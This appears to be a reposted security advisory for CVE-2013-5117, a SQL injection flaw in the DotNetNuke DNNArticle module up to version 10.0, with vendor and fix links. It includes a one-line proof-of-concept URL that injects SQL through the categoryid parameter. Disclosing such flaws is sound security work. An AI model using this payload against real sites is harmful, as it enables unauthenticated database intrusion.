DotNetNuke DNNArticle Module 10.0 – SQL Injection Vulnerability

日期: 2013/08/20 | 标签:dotnetnuke | 游览：1,551

Title: DotNetNuke (DNNArticle Module) SQL Injection Vulnerability
References: CVE-2013-5117
Discovered by: Sajjad Pourali

Vendor http://www.zldnn.com/ , http://www.dnnarticle.com/‎
Vendor advisory: http://www.zldnn.com/Support/tabid/643/ctl/RecordList/mid/1691/ItemID/2979/Default.aspx (Ticket iD:#2979)
Vendor contact: 2013-8-14

Solution: http://www.zldnn.com/Support/tabid/643/ctl/RecordList/mid/1691/ItemID/2979/Default.aspx (Ticket iD:#2979)

Remote: yes
Authentication required: no
User interaction required: no
Impact: High

Affected:

– DNNArticle 10.0 and earlier

—

PoC:

http://server/desktopmodules/dnnarticle/dnnarticlerss.aspx?moduleid=0&categoryid=1+or+1=@@version

—

+ Sajjad Pourali
+ http://www.securation.com/
+ http://www.cert.um.ac.ir/
+ Contact: sajjad[at]securation.com

← Alibaba Clone Tritanium Version (news_desc.html) – SQL Injection Vulnerability

Pligg CMS 2.0.0rc2 – CSRF File Creation Vulnerability →

ZeroBox Vulnerability Database

坚持！我们将做的更好！

DotNetNuke DNNArticle Module 10.0 – SQL Injection Vulnerability

评论关闭。